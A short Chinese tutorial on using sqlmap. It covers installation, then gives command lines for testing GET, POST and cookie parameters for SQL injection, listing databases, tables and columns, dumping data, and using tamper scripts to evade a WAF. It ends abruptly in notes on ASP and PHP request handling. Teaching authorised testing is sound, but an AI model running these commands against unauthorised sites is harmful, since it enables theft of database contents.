小迪教程第八天——注入工具sqlmap的使用
1、安装过程
1)安装python2.7
2)在python2.7的目录中解压sqlmap
3)在桌面建立快捷方式
2、使用方法
1)get类型注入
Sqlmap.py -u 注入地址
检测指定站点注入情况,默认会以get类型注入检测
2)post类型注入
3)cookie类型注入
Sqlmap.py -u 注入地址 –cookie “参数” –level 2
以cookie注入提交检测网站
4)获取表信息
列表名: Sqlmap.py -u 注入地址 –tables
5)列指定表名下的列名
Sqlmap.py -u 注入地址 –columns -T 表名
6)取指定表名列名下的数据
Sqlmap.py -u 注入地址 –dump -C “列名” -T 表名
7)其他使用
Sqlmap.py -u 注入地址 检测指定站点注入情况
默认会以get类型注入检测
Sqlmap.py -u 注入地址 –data “参数”
以post注入提交检测网站
Sqlmap.py -u 注入地址 –cookie “参数” –level 2
以cookie注入提交检测网站
Sqlmap.py -u 注入地址 –dbs 列数据库
Sqlmap.py -u 注入地址 –current-db 当前数据库名
Sqlmap.py -u 注入地址 –tables 列表名
Sqlmap.py -u 注入地址 –columns -T 表名 列指定表名下的列名
Sqlmap.py -u 注入地址 –dump -C “列名” -T 表名 获取指定表名下的列名的数据
3、高级技能
使用sqlmap中的其他插件,如使用tamper脚本绕过waf注入
4、其他内容
asp语言
Request 全部接受
Request.querystring get传递
Request.form post传递
Request.cookie cookie传递
php语言
$_SERVER